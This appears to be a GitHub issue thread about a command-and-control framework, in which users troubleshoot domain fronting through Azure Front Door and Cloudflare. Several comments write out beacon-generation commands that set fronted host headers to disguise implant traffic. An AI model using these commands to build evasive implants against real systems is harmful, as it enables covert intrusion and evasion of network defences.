navaneeth-dev
commented
1 week ago Just tried to replicate it, everything is working fine, maybe try generating with -d and post the logs of the client?
Open MaorSabag opened 2 weeks ago
navaneeth-dev
commented
1 week ago Just tried to replicate it, everything is working fine, maybe try generating with -d and post the logs of the client?
MaorSabag
commented
6 days ago Screenshot with -d options:
navaneeth-dev
commented
6 days ago Oh I did not use wininet driver, can you try without that?
MaorSabag
commented
6 days ago Got a few insights 😅
Without the driver parameter set but with a proxy set on the Windows host, got the same results:
Without the driver parameter set and without the proxy set on the Windows host, got a successful result:
Seems like a bug. I'm dealing with an organization proxy, thus the proxy options should be included if I want to use my frontdoor.
navaneeth-dev
commented
4 days ago Yes seems like a bug, I don't have the time right now but maybe others can look into it.
I don't see any references to WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY which should detect the proxy automatically.
But I am not too sure.
markuta
commented
17 hours ago I had a very similar problem, but with Cloudflare instead of Azure. I solved it by removing the driver=wininet parameter when generating a beacon e.g.
generate beacon --http http://cdnjs.com?host-header=XXXXXXXX.worker.dev --seconds 5 --jitter 4 --save /tmp/beacon_http2.exe
heyquentin
commented
15 hours ago I had a very similar problem, but with Cloudflare instead of Azure. I solved it by removing the
driver=wininetparameter when generating a beacon e.g.generate beacon --http http://cdnjs.com?host-header=XXXXXXXX.worker.dev --seconds 5 --jitter 4 --save /tmp/beacon_http2.exe
Do you have any ideas on how I'd do this using CloudFront?
Describe the bug I have a frontdoor setup on azure for domain fronting (for example: frontdoor.azureedge.net), when generating an http/s payload and setting the host-header to the azure domain, it does not set it up when the payload is executed.
To Reproduce Steps to reproduce the behavior:
generate --http ajax.microsoft.com/api?driver=wininet&host-header=frontdoor.azureedge.net --skip-symbolsExpected behavior the host header should be: frontdoor.azureedge.net with the domain of ajax.microsoft.com.
Screenshots The request sent from the payload:
Working request to the azure frontdoor by setting the host header manually:
Desktop (please complete the following information):
Additional context Even tried to change the code manually (eventhough I'm so sure about), set the req.Host = "frontdoor.azureedge.net". But it had not effect on the request.